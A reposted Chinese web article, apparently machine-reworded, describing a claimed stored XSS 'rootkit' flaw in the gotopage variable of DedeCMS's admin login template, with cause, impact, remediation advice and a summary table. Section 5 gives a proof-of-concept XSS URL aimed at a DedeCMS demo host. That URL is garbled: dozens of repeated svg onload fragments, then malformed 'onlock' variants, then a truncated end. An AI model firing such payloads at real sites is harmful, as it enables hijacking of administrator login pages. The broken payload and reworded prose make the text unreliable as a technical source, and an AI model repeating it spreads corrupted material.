如何在DEDECMS中利用gotopage变量XSS破绽实现Rootkit 0day攻击?
- 行业动态
- 2024-10-12
- 1
DEDECMS全版本存在gotopage变量XSS破绽,可能导致ROOTKIT 0DAY攻击。请尽快更新或采取安全措施。
DEDECMS(织梦内容管理系统)是一个广泛使用的PHP开源网站管理系统,主要用于搭建新闻、博客等类型的网站,由于其代码的复杂性和历史遗留问题,DEDECMS系统经常被发现存在各种安全破绽,其中一个严重的破绽是全版本gotopage变量XSS ROOTKIT 0DAY破绽。
DEDECMS gotopage变量XSS ROOTKIT 0DAY破绽概述
1、破绽描述:在DEDECMS后台登录模板中,存在一个名为gotopage的变量,这个变量用于存储用户登录后需要跳转到的页面地址,该变量未对传入的数据进行有效的验证和过滤,导致反面用户可以提交包含JavaScript代码的数据。
2、破绽位置:该破绽位于dedetempletslogin.htm文件的第65行左右,具体代码为<input type="hidden" name="gotopage" value="<?php if(!empty($gotopage)) echo $gotopage;?>" />。
3、破绽成因:由于DEDECMS的全局变量注册机制,gotopage可以被COOKIE变量覆盖,而COOKIE可以在客户端持久化存储,这意味着,一旦反面用户利用此破绽提交了包含反面代码的gotopage值,该反面代码将会在客户端持久化存储,并在后续的登录过程中被触发。
4、破绽危害:管理员在触发DEDECMS任意的XSS破绽(如留言本XSS)后,可以通过该破绽永久劫持覆盖gotopage变量,在DEDECMS的后台登录页面永久嵌入任意的反面代码,这可能导致网站被反面改动、数据被盗取或丢失,甚至服务器被完全控制。
5、破绽验证:要验证此破绽,可以复制粘贴特定的URL访问,以触发XSS安装XSS ROOTKIT,http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>alert(‘XSS’)</script><![CDATA[> <!DOCTYPE html> <html><body></body></html> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onload=alert(‘rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootkit installed’)//> <!#><svg/onlock=’rootki’ rootkit installed’)//]
6、影响版本:该破绽影响了DEDECMS的所有版本。
FAQs
1、如何修复此破绽?
答案:修复此破绽的方法包括更新DEDECMS到最新版本(如果官方已经发布了修复补丁),或者手动修改dedetempletslogin.htm文件中的相关代码,对gotopage变量进行严格的数据验证和过滤,防止反面代码注入。
2、如何检测网站是否受到此破绽的影响?
答案:可以通过尝试访问包含特定参数的URL来检测网站是否受到此破绽的影响,访问http://yourwebsite.com/dede/login.php?gotopage=dasdasdasda,如果页面返回异常或执行了非预期的操作,那么网站可能受到此破绽的影响,还可以使用专业的网站安全扫描工具进行更全面的检测。
通过以上分析可以看出,DEDECMS全版本gotopage变量XSS ROOTKIT 0DAY破绽是一个严重的安全威胁,为了保护网站的安全,建议网站管理员及时采取相应的防护措施,并密切关注DEDECMS官方的安全公告和更新。
特性 | 描述 |
破绽名称 | DEDECMS全版本gotopage变量XSS ROOTKIT 0DAY |
影响版本 | DEDECMS所有版本 |
破绽类型 | XSS(跨站脚本攻击)和ROOTKIT(后门程序) |
破绽影响 | 攻击者可利用此破绽获取网站管理员权限,进一步控制网站 |
破绽利用条件 | 攻击者需要访问受影响的网站,并触发破绽 |
破绽触发点 | gotopage变量 |
破绽利用示例 | 攻击者可以通过构造特定的URL,利用此破绽执行反面脚本 |
安全建议 | 1. 及时更新到最新版本的DEDECMS,修复破绽; 2. 限制用户权限,降低破绽风险; 3. 定期对网站进行安全检查,发现破绽及时修复。 |
本站发布或转载的文章及图片均来自网络,其原创性以及文中表达的观点和判断不代表本站,有问题联系侵删!
本文链接:http://www.xixizhuji.com/fuzhu/121783.html